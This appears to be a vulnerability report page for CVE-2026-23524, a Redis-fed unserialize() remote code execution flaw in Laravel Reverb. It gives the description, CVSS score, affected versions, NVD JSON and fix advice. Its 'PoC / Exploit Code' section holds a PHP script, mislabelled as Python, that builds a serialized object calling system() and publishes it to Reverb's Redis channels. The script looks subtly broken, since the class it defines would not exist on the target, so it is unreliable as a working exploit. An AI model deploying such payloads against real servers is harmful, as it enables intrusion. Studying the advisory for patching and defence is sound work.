Security Vulnerability Report
中文
CVE-2026-23524 CVSS 9.8 CRITICAL

CVE-2026-23524

Published: 2026-01-21 22:15:50
Last Modified: 2026-03-06 20:02:37
Source: [email protected]

Description

Laravel Reverb provides a real-time WebSocket communication backend for Laravel applications. In versions 1.6.3 and below, Reverb passes data from the Redis channel directly into PHP’s unserialize() function without restricting which classes can be instantiated, which leaves users vulnerable to Remote Code Execution. The exploitability of this vulnerability is increased because Redis servers are commonly deployed without authentication, but only affects Laravel Reverb when horizontal scaling is enabled (REVERB_SCALING_ENABLED=true). This issue has been fixed in version 1.7.0. As a workaround, require a strong password for Redis access and ensure the service is only accessible via a private network or local loopback, and/or set REVERB_SCALING_ENABLED=false to bypass the vulnerable logic entirely (if the environment uses only one Reverb node).

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:laravel:reverb:*:*:*:*:*:*:*:* - VULNERABLE
Laravel Reverb < 1.7.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php // CVE-2026-23524 PoC - Laravel Reverb Unserialize RCE // Target: Laravel Reverb <= 1.6.3 with REVERB_SCALING_ENABLED=true class LaravelReverbExploit { public $cmd; function __destruct() { system($this->cmd); } } // Generate malicious serialized payload $exploit = new LaravelReverbExploit(); $exploit->cmd = 'id > /tmp/pwned.txt'; $payload = serialize($exploit); echo "Malicious Payload: " . $payload . "\n"; // Connect to Redis and publish to Reverb channel $redis = new Redis(); $redis->connect('127.0.0.1', 6379); // Publish to Reverb's presence channel $redis->publish('reverb:presence', $payload); $redis->publish('reverb:private', $payload); echo "Payload sent to Redis channel\n"; // Alternative: Using Predis library // $predis = new Predis\Client(); // $predis->publish('reverb:presence', $payload); ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23524", "sourceIdentifier": "[email protected]", "published": "2026-01-21T22:15:50.280", "lastModified": "2026-03-06T20:02:37.250", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Laravel Reverb provides a real-time WebSocket communication backend for Laravel applications. In versions 1.6.3 and below, Reverb passes data from the Redis channel directly into PHP’s unserialize() function without restricting which classes can be instantiated, which leaves users vulnerable to Remote Code Execution. The exploitability of this vulnerability is increased because Redis servers are commonly deployed without authentication, but only affects Laravel Reverb when horizontal scaling is enabled (REVERB_SCALING_ENABLED=true). This issue has been fixed in version 1.7.0. As a workaround, require a strong password for Redis access and ensure the service is only accessible via a private network or local loopback, and/or set REVERB_SCALING_ENABLED=false to bypass the vulnerable logic entirely (if the environment uses only one Reverb node)."}, {"lang": "es", "value": "Laravel Reverb proporciona un backend de comunicación WebSocket en tiempo real para aplicaciones Laravel. En las versiones 1.6.3 e inferiores, Reverb pasa datos del canal Redis directamente a la función unserialize() de PHP sin restringir qué clases pueden ser instanciadas, lo que deja a los usuarios vulnerables a la ejecución remota de código. La explotabilidad de esta vulnerabilidad se incrementa porque los servidores Redis se implementan comúnmente sin autenticación, pero solo afecta a Laravel Reverb cuando el escalado horizontal está habilitado (REVERB_SCALING_ENABLED=true). Este problema ha sido solucionado en la versión 1.7.0. Como solución alternativa, requiera una contraseña fuerte para el acceso a Redis y asegúrese de que el servicio solo sea accesible a través de una red privada o loopback local, y/o configure REVERB_SCALING_ENABLED=false para eludir completamente la lógica vulnerable (si el entorno utiliza solo un nodo Reverb)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:laravel:reverb:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.7.0", "matchCriteriaId": "AC0C178D-8618-4963-8AB2-75B260023D0A"}]}]}], "references": [{"url": "https://cwe.mitre.org/data/definitions/502.html", "source": "[email protected]", "tags": ["Technical Description"]}, {"url": "https://github.com/laravel/reverb/commit/9ec26f8ffbb701f84920dd0bb9781a1797591f1a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/laravel/reverb/releases/tag/v1.7.0", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/laravel/reverb/security/advisories/GHSA-m27r-m6rx-mhm4", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}, {"url": "https://laravel.com/docs/12.x/reverb#scaling", "source": "[email protected]", "tags": ["Technical Description"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.